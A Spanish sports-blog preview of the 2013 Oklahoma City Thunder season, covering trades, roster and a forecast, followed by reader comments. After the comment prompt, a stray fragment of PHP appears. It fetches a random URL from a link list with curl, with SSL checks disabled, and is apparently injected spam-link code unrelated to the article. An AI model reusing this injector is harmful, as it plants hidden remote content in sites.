Oklahoma City Thunder: La gloria o el olvido

21 de October de 2013 por TheDeerHunter

Febrero de 2011. Los Boston Celtics envían a Kendrick Perkins y Nate Robinson a Oklahoma a cambio de Jeff Green y Nenad Krstic. Desde aquel momento los Thunder velaban armas para batir en playoffs a los bicampeones Lakers ya que Andrew Bynum todavía no había cambiado el baloncesto por el levantamiento de conejitas. Muchos lo leyeron como el movimiento definitivo para garantizarles el anillo y la franquicia apostó fuerte por esa baza firmando a Perkins una extensión de 35 millones en 4 años. Robinson, por el contrario, sólo pasó por allí fugazmente.

Lo que se terminó constatando es que aquel movimiento no supuso el salto cualitativo esperado. Aquella campaña terminó para ellos con una severa derrota ante Dallas, que a la postre sería el campeó, con Perkins claramente infrautilizado ante Tyson Chandler, que no es precisamente un referente ofensivo. El siguiente curso se caracterizó por el desarrollo de todas las jóvenes perlas de la plantilla y alcanzarían la final ante Miami. Nuevamente el pívot se vio desubicado, sin pareja de baile clara. Aquello fue lo más cerca que han estado de la gloria. Perkins se ha quedado en un simple center del montón, que tampoco ha llegado al nivel defensivo que ofreció en Boston.

Al principio del curso pasado ocurrió lo inevitable. La franquicia iba a ser incapaz de renovar simultáneamente a James Harden y Serge Ibaka. Dado que con Durant y Westbrook la potencia ofensiva está asegurada se optó por el ala-pívot. La barba más famosa de la NBA salió camino de Houston, junto a Daquean Cook, Cole Aldrich y Lazar Hayward a cambio de Kevin Martin, Jeremy Lamb y algunas rondas del 2013. Automáticamente Harden se convertía en estrella de la liga, mientras que Martin pasaba a ser la referencia de la segunda unidad los días que le daba aire. Como sabemos todos los Thunder echaron como nunca de menos a Harden en la derrota contra Memphis, con Westbrook lesionado, Durant sobremarcado, Martin racheando, Lamb de espectador y… Perkins, esta vez ante un pívot de entidad, completamente superado. Ni siquiera Derek Fisher fue capaz de obrar milagros esta vez. 

Curiosamente ya hicimos mención de extrañas sensaciones al inicio del curso pasado, cuando el Harden-gate no era todavía un hecho. Hoy, el Oeste, como cada año, se presenta altamente reforzado y los Thunder han tenido las manos atadas frente al mercado. Kevin Martin ha terminado yéndose por donde vino… y la comparación entre la plantilla actual y la que había antes del traspaso de Perkins es verdaderamente odiosa.

Tampoco queremos decir que todo se haya hecho mal durante este tiempo ni que los Thunder hayan dejado de ser candidatos. Lo siguen siendo, posiblemente de los más claros para alcanzar la final del Oeste y eso es mucho. También pudimos entender en su momento, al menos parcialmente, cada una de las decisiones que tomaron, pero parece demostrado que no han salido nada bien.

Los Thunder cuentan con una línea de bases de máximas garantías. Comienzan con el indiscutible contratiempo de un Russell Westbrook lesionado pero cuando vuelva demostrará que es de los dos o tres hombres más desequilibrantes de la liga en su posición, y además el año pasado mejoró mucho en la dirección. En su ausencia hay pocos reservas que puedan cumplir con su papel como hace Reggie Jackson, tan eléctrico y descarado como su titular. Como tercer guard, el compañero favorito de Kobe Bryant, el sempiterno Dereck Fisher, al que querrán regular para que tenga opción de liarla en la postemporada.

En la posición de escolta la preocupación es alta. Thabo Sefolosha cumplirá como el especialista que es. La preocupación viene por Jeremy Lamb, que iba para figura pero de momento no ha demostrado nada. Ahora tiene su gran oportunidad, pero su pretemporada ha sido lamentable. Si no logra espabilar los Thunder deberán moverse rápidamente.

De tres, tenemos al inigualable Kevin Durant, quizá el mejor jugador ofensivo del mundo, que como decíamos se ha LeBronizado en los últimos tiempos y cada día es más completo. Quitas a Durantula y el panorama es desolador. El fichaje de un Ryan Gomes en pleno hundimiento deportivo no es la mejor de las noticias. Las otras alternativas vienen a ser cuatros reconvertidos. Por un lado el rookie André Roberson, un reboteador bajito que deberá adaptarse a la posición de alero como profesional y por el otro Perry Jones, interior con ínfulas de exterior que no disfrutó de minutos en su temporada de debut. Difícilmente Brooks podrá hacer jugar a Durant de 4 como probó frecuentemente el año pasado.

Una buena parte de las opciones con las que cuentan los Thunder para mantener sus opciones están en manos del power forward Serge Ibaka y a una nueva vuelta de tuerca en su evolución técnica y táctica. A la explosividad física que siempre le ha caracterizado, cada día le observamos nuevos recursos de distinta índole. Pocos niegan ya su condición de estrella (pos. 39 en el NBA Rank de la ESPN) y deberá ratificarlo. Nick Collison es un excelente reserva que siempre dará todo lo que tiene para la causa.

En la posición de center parte como titular Kedrick Perkins, del que ya hemos hablado. Sabemos que cumplirá y se pegará con quien haga falta (o incluso si no hace falta) pero no vale lo que le pagan y deberán encontrar alguna alternativa más productiva para según qué escenarios. Por suerte aquí sí ha surgido Steve Adams como grata sorpresa durante la pretemporada. Gran reboteador y taponador, aunque pésimo lanzador de tiros libres. Como tercera opción tenemos a Hasheem Thabeet, aunque ya muy pocos esperan nada más de él de lo que ha mostrado.

Sobre el papel, cualquier equipo que tenga a Durant, Westbrook e Ibaka ganará un saco de partidos. Volverán a ser particularmente peligrosos en playoffs, pero teniendo en cuenta los rivales en liza y algunas carencias propias significativas no les vemos metiéndose en la final de la liga. Cada año va a estar más difícil para ellos… de no contemplar seriamente cierta amnistía. Blanco y en botella.

Quinteto inicial: Russell Westbrook, Thabo Sefolosha, Kevin Durant, Serge Ibaka, Kedrick Perkins.
6º hombre: Reggie Jackson

Altas: Steven Adams (N), Ryan Gomes, André Roberson (N).
Bajas: Ronnie Brewer (HOU), DeAndre Liggins, Kevin Martin (MIN), Daniel Orton.

Pronóstico: Cerca de 55 victorias. 1º en la Northwest. 2º/3º del Oeste. Finalistas de conferencia.

Comenta

13 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Una pena… Eso es lo que me parece la situación de un equipo que invitaba a pensar en varios títulos y que ahora amenaza con quedarse en nada a grandes pasos.
    Nunca entendí la operación de Perkins que les quitaba a un jugador de tremenda calidad y muy joven como Jeff Green y además les ataba de manos para renovar a Harden, la otra perla del equipo. Estaba claro que no iban a poder renovar a Green, Harden e Ibaka pero sin Perk en el equipo podrían haber renovado a Harden e Ibaka e intentar sacar algo bueno (aunque sean rondas de draft) por Green. Una auténtica cagada en las oficinas que ha condenado un equipo que era el del futuro a ser uno más.
    Aún así con Durant y Westbrook en sus filas seguirán peleando por todo en el Oeste. Tal como se dice en este análisis sus opciones van a depender mucho del rendimiento y nuevo salto de calidad y responsabilidades de Ibaka y de cómo respondan sus secundarios. Para este año se esperan todavía más problemas desde el banquillo sin un anotador como Kevin Martin que descargue algo de trabajo a KD y Westbrook.
    Para mí la franquicia necesita amnistiar ya a Perkins e intentar con ese dinero atraer un anotador, a poder ser interior que les pueda dar lo que les falta para aspirar al anillo. Eso o empezarán a ver cómo desperdician un talento único como Durantula…

      Citar

  2. Esteban dice:
    #2

    comparto en lines generales, pero han que ser paciente y pensar en que luego de los primeros 15 partidos volvera westbrookl y ahi la historia sera otra

    puede que hoy no tengan equipo como para ganar la liga, pero si apuestan al desarrollo de jackson, potencialmente puede cumplir la funcion de harden, de lamb si alguna vez se decide a cumplir con las expectativas y adams si repite lo hecho en la pretmeporada, tienen un equipo muy solido y balanceado para los proximos 5 años y para dominar la liga

    el traspaso de haden se hizo para contar con lamb y el pick que trajo a adams, es hora de ver si valio la pena

      Citar

  3. Txusma dice:
    #3

    Esteban:
    comparto en lines generales, pero han que ser paciente y pensar en que luego de los primeros 15 partidos volvera westbrookl y ahi la historia sera otra

    puede que hoy no tengan equipo como para ganar la liga, pero si apuestan al desarrollo de jackson, potencialmente puede cumplir la funcion de harden, de lamb si alguna vez se decide a cumplir con las expectativas y adams si repite lo hecho en la pretmeporada, tienen un equipo muy solido y balanceado para los proximos 5 años y para dominar la liga

    el traspaso de haden se hizo para contar con lamb y el pick que trajo a adams, es hora de ver si valio la pena

    Yo consideraría inválido cualquiera análisis con más de 1 “Si…”. Más que nada pq haciendo cuentos de la lechera todos los equipos tienen material para dominar la liga los próximos 5 años.

      Citar

  4. Esteban dice:
    #4

    es que si vemos el hoy, tanto adams como lamb parece que no pueden ayudar mucho, y menos peligrosos parecen sin westbrook

    pero a la hora de los PO y los proximos años, la situacion va a cambiar radicalmente, sobretodo por adams que a mi parecer tiene pasta de centro titular por varios años en el thunder, pero ahora no

      Citar

  5. Denise dice:
    #5

    Equipo cortisimo y poco profundo. Solo pueden ganar el anillo si Durant y Westbrook llegan al 100% en Playoffs, y si Adams y Lamb son capaces de aportar 15-20 minutos de calidad.
    Si estas dos premisas no se cumplen, los veo entre el 6º y el 8º del Oeste y eliminados en primera ronda.
    Y en verano…Durant pidiendo el traspaso.

      Citar

  6. rumbero dice:
    #6

    Gran análisis.
    Yo creo que más que por Adams y Lamb la esperanza esta temporada pasa por Ibaka y Reggie Jackson. Veremos si lo del primero va en serio durante la RS pero parece que le ha dado por trabajar bastante su repertorio ofensivo. Y el segundo ya demostró en los PO de la temporada pasada que puede suplir a Westbrook más que bien, y en cuanto vuelva éste compartir con él minutos desde el 2. Ojo con la parejita.
    No voy a darles más abajo de 4º en el oeste a un equipo que tiene a Durant por mucho que vayan a estar más de un mes sin Westbrook. Candidatos aunque cada año parece que lo sean un poco menos

      Citar

  7. Vader dice:
    #7

    Todo lo bien que eligieron en el draft lo han perdido, en parte, con sus traspasos. Si consigues reunir via draft a Durant, Westbrook, Harden, Ibaka y Green no puede ser que te quedes al cabo de unos años con la plantilla actual. Sacaron muy poco por Green y por Harden y ahora estan como estan.

    Si este año no se acercan al anillo a ver que ambiente hay porque esta claro que sus dos estrellas son top ten de la liga y merecen un equipo que les arrope para ganar el anillo.

    Saludos

      Citar

  8. Esteban dice:
    #8

    rumbero:
    Gran análisis.
    Yo creo que más que por Adams y Lamb la esperanza esta temporada pasa por Ibaka y Reggie Jackson. Veremos si lo del primero va en serio durante la RS pero parece que le ha dado por trabajar bastante su repertorio ofensivo. Y el segundo ya demostró en los PO de la temporada pasada que puede suplir a Westbrook más que bien, y en cuanto vuelva éste compartir con él minutos desde el 2. Ojo con la parejita.
    No voy a darles más abajo de 4º en el oeste a un equipo que tiene a Durant por mucho que vayan a estar más de un mes sin Westbrook. Candidatos aunque cada año parece que lo sean un poco menos

    es cierto rumbero que las esperanzas pasaran por ibaka y jackson, pero me da la impresion que ambos ya estan en un nivel grandisimo

    las clave de adams y lamb es que en ambos puestos estan muy flojitos estos thunder, y si tanto lamb aporta puntos y tiros de la bnaca y adams se consolida como un interno de recambio de nivel (muy bueno lo suyo en pretemporada), tienen un equipo suficientemente bueno para ganar el titulo

      Citar

  9. Denise dice:
    #9

    Esteban: es cierto rumbero que las esperanzas pasaran por ibaka y jackson, pero me da la impresion que ambos ya estan en un nivel grandisimo

    las clave de adams y lamb es que en ambos puestos estan muy flojitos estos thunder, y si tanto lamb aporta puntos y tiros de la bnaca y adams se consolida como un interno de recambio de nivel (muy bueno lo suyo en pretemporada), tienen un equipo suficientemente bueno para ganar el titulo

    Exacto, tened en cuenta que los Thunder vienen de perder a Kevin Martin y por tanto Lamb está obligado a cumplir con su rol.
    Y Adams tiene que empezar a quitarle minutos a Perkins y demostrar que puede ser el center del equipo para el futuro.
    Aun así sigo viendo muy corto al equipo.Si el otro dia hablabamos de rotación aprovechable en Clippers y Warriors, la de los Thunder se limita 9 jugadores, de los cuales uno es el truño de Perkins, y 2 son las incognitas Lamb y Adams.

      Citar

  10. Esteban dice:
    #10

    Denise: Exacto, tened en cuenta que los Thunder vienen de perder a Kevin Martin y por tanto Lamb está obligado a cumplir con su rol.
    Y Adams tiene que empezar a quitarle minutos a Perkins y demostrar que puede ser el center del equipo para el futuro.
    Aun así sigo viendo muy corto al equipo.Si el otro dia hablabamos de rotación aprovechable en Clippers y Warriors, la de los Thunder se limita 9 jugadores, de los cuales uno es el truño de Perkins, y 2 son las incognitas Lamb y Adams.

    aunque el thunder siempre fue un equipo de roatacion corta

    fisher jugando siempre poquito como base suplente, harden jugando muchos minutos, y collison lo mismo

    mohamed, thabeet, cook y o maynor solo jugaban minutitos

    es mas o menos lo mismo este año, fisher como siempre, jackson jugando lo que hacia harden, lamb de tirador si logra hacerse un hueco y adams robandole minutos a thabeet

      Citar

  11. txusma dice:
    #11

    Es que esa es la grandeza de la NBA. A la larga prácticamente ningún equipo puede mantener a 3 estrellas del calibre de Durant, Westbrook y Harden y rodearlas con tios como Ibaka, Kevin Martin, Jeff Green, etc… No han hecho nada mal, simplemente han dejado pasar su momento. O al menos lo parece. No olvidemos que los Mavs ganaron cuando casi nadie los esperaba. Un equipo con Durant siempre es candidato.

      Citar

  12. Luis H. dice:
    #12

    Yo creo que entre hacer una buen temporada y hacer algo serio va en función de tres cosas:
    1-que las lesiones respeten a RW y KD
    2- que Reggie Jackson e Ibaka funcionen al nivel que se les pide
    ambas las doy por seguras a día de hoy, más allá de la lesión de Wes (supongo que volverá a tope)
    3- Adams, Lamb y Perry Jones. Un entrenador como Brooks tiene que ganarse el sueldo aquí, dando confianza, minutos y enseñanzas a estos tres para que sean capaces de generar por ellos mismos. Los tres lo hacían en la universidad. Un tío como Perry Jones en el poste debería ser una máquina, jugando de cara al aro es muy bueno. Lamb como ametralladora y Adams aportando allá abajo.
    PD: no pido milagros, pero Perkins debería estar todo el día practicando movimientos de ataque: gancho, tiro de 4 metros. ¿A qué se dedica en su tiempo libre? ¿Por qué no le exigen más?

      Citar

  13. r_miller dice:
    #13

    Es una pena porque parece que este equipo no va a ser nada mas de lo que ya fue, los puedo compara con los Portland Trail Blazers de los 90, si llegaron a dos finales pero al final habia un ser superior (en su caso Jordan ahora menos pero lebron) que les pasaba la mano por la cara. Un gran base y un gran escolta en el caso de Portland que no podia con Jordan que jugaba en la misma posicion que durant con lebron. Uno no pudo con el otro y va a volver a pasar, los Thunder, como los Knicks no van a ganar ningun anillo con el equipo que tiene, quizas Indiana o Chicago, pero Miami esta demasiado sobrecargado de talento, lo que me produce mucha tristeza porque le han quitado la emocion que tenia el baloncesto hasta ahora.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>